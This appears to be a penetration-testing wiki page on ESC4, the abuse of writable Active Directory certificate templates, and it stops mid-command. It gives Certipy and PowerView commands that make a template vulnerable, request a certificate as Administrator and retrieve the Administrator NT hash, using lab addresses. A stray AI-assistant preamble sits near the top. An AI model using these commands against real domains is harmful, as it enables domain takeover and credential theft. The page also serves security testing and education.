Skip to main content

ESC4

Certainly! Here's the modified and formatted version:

ESC4

ESC4 Abuse Requirements

To perform an ESC4 attack, one must have extensive rights over the certificate templates. By manipulating these objects, it's possible to introduce misconfigurations to a non-vulnerable template. For instance, enabling the mspki-certificate-name-flag flag for a template that permits domain authentication can lead to a domain compromise scenario, similar to ESC1, where low-privileged users can specify an arbitrary Subject Alternative Name and authenticate as someone else.

To make a template vulnerable, modify the following attributes with the specified values:

  1. Grant Enrollment rights for the vulnerable template.
  2. Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval.
  3. Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement.
  4. Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN.
  5. Set the mspki-certificate-application-policy to a certificate purpose for authentication:
    • Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
    • Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
    • PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
    • Any Purpose (OID: 2.5.29.37.0)
    • No Extended Key Usage (EKU)

Linux

Attacking ESC4 vulnerable template

PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -save-ol -dc-ip 10.10.10.10

ESC4 Template after modification

PS /home/bobbuilder> certipy find -u 'user1@local.lab' -p 'password1' -vulnerable -stdout -dc-ip 10.10.10.10

Abusing the modified template

PS /home/bobbuilder> certipy req -u 'user1@local.lab' -p 'password1' -ca lab-LAB-DC-CA -template Template4 -upn Administrator

Retrieve Administrator NT Hash

PS /home/bobbuilder> certipy auth -pfx administrator.pfx -username Administrator -domain local.lab

Restore template configuration

PS /home/bobbuilder> certipy template -u 'user1@local.lab' -p 'password1' -template Template4 -configuration Template4.json
  1. Create template
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -save-old -dc-ip 10.10.10.10
  1. Restore
PS /home/bobbuilder> certipy template -u "user1@local.lab" -p "password1" -template SSL -configuration SSL.json -dc-ip 10.10.10.10

Windows

Import-Module PowerView

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> Import-Module .\PowerView.ps1

Add Certificate-Enrollment rights (to the Domain Users group)

PS /home/bobbuilder> Add-DomainObjectAcl -TargetIdentity Template4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=lab,DC=local" -Verbose

Disabling Manager Approval Requirement

To disable the manager approval requirement, use the following PowerShell commands:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local" -Identity Template4 -Set @{'mspki-enrollment-flag'=9} -Verbose

Disabling Authorized Signature Requirement

To disable the authorized signature requirement, set mspki-ra-signature attribute to 0:

PS /home/bobbuilder> Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab